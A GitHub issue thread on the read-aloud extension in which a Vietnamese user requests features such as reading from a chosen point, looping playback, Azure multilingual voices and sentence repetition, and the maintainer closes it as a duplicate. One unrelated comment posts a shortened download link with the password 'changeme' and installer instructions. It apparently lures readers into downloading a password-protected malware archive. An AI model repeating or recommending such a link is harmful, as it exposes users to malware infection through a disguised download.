### ISSUE TITLE
Vài ý tưởng chức năng mới.

### ISSUE THREAD

**Issue by trionline1234** [ken107/read-aloud#419]
Em chào anh,
Em có vài ý tưởng thú vị mong anh tham khảo:
1. Đọc từ một đoạn nào đó ở giữa văn bản cho đến hết hoặc  khi cần dừng thì bấm stop (đỡ mất công phải select một vùng rộng)
 - Cụ thể: Chỉ cần chọn vị trí trỏ chuột(có thể select một đoạn nhỏ nào đó và tool sẽ bắt đầu từ cuối đoạn select đó) để tool bắt đầu đọc từ mốc đó cho đến hết văn bản  hoặc tới khi người dùng thấy đủ thì bấm  phím tắt để stop.
2. Đọc lặp đi lặp lại cả bài.
3. Bổ sung các giọng miễn phí của Microsoft Azure ( vì có hỗ trợ Multilingual voice cho văn bản đa ngôn ngữ).
4. Đọc lặp đi lặp lại từng câu với một số lần cho trước.

Thực sự tool của anh đã rất tuyệt vời nhưng nếu có  thêm các chức năng trên thì sẽ tốt hơn nhiều ạ
Em cảm ơn anh đã đọc.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by ken107** [comment]
Please do not open duplicate issues #423
